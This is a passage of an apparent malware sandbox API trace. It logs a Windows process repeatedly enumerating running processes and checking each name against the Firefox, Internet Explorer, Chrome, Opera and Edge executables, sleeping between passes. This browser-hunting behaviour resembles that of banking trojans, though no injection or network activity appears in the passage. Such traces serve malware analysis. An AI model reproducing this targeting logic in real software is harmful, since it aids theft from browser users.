(lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0210.085] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0210.085] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0210.085] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0210.085] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0210.085] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0210.085] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0210.085] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0210.085] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0210.085] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0210.085] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.085] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0210.086] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0210.086] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0210.086] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0210.086] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0210.086] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0210.086] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0210.087] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0210.087] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0210.087] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0210.087] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0210.087] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.087] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0210.087] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0210.087] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0210.087] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0210.087] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0210.087] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.087] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.088] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0210.088] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0210.088] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0210.088] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0210.088] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.088] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0210.089] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0210.089] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0210.089] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0210.089] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0210.089] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.089] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.089] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0210.089] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0210.089] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0210.089] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0210.089] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.089] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0210.090] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0210.090] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0210.090] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0210.090] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0210.090] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.090] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.090] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0210.090] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0210.090] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0210.090] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0210.090] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.090] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0210.091] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0210.091] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0210.091] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0210.091] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0210.091] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0210.091] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0210.092] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0210.092] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0210.092] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0210.092] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0210.092] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.092] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0210.125] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0210.125] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0210.125] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0210.125] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0210.125] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.125] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0210.125] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0210.125] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0210.125] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0210.126] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0210.126] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0210.126] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0210.126] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0210.126] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0210.126] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0210.126] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0210.126] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0210.126] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0210.127] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0210.127] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0210.127] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0210.127] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0210.127] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0210.127] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0210.127] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0210.127] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0210.127] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0210.127] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0210.127] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0210.127] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0210.128] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0210.128] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0210.128] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0210.128] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0210.128] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0210.128] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0210.128] CloseHandle (hObject=0xe8) returned 1 [0210.128] Sleep (dwMilliseconds=0x3e8) [0211.170] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0211.173] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0211.173] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0211.173] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0211.173] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0211.173] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0211.173] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0211.173] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0211.174] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0211.174] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0211.174] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0211.174] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0211.174] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0211.174] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0211.174] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0211.174] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0211.174] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0211.174] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0211.174] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.174] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0211.175] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0211.175] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0211.175] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0211.175] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0211.175] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0211.175] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0211.175] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0211.175] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0211.175] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0211.175] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0211.176] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.176] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0211.176] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0211.176] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0211.176] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0211.176] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0211.176] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0211.176] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0211.177] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0211.177] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0211.177] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0211.177] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0211.177] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.177] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0211.177] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0211.177] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0211.177] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0211.177] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0211.177] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.177] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0211.178] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0211.178] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0211.178] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0211.178] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0211.178] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0211.178] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0211.178] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0211.178] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0211.178] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0211.178] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0211.178] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0211.178] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.179] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0211.179] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0211.179] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0211.179] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0211.179] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.179] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.180] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0211.180] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0211.180] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0211.180] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0211.180] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.180] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.180] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0211.180] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0211.180] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0211.180] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0211.180] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.180] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.181] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0211.181] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0211.181] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0211.181] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0211.181] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.181] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.181] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0211.181] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0211.181] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0211.182] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0211.182] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.182] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0211.182] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0211.182] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0211.182] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0211.182] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0211.182] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0211.182] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.183] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0211.183] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0211.183] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0211.183] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0211.183] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.183] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.183] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0211.183] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0211.183] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0211.183] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0211.183] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0211.183] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0211.184] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0211.184] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0211.184] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0211.184] lstrcmpiA (lpString1="dwm.exe", 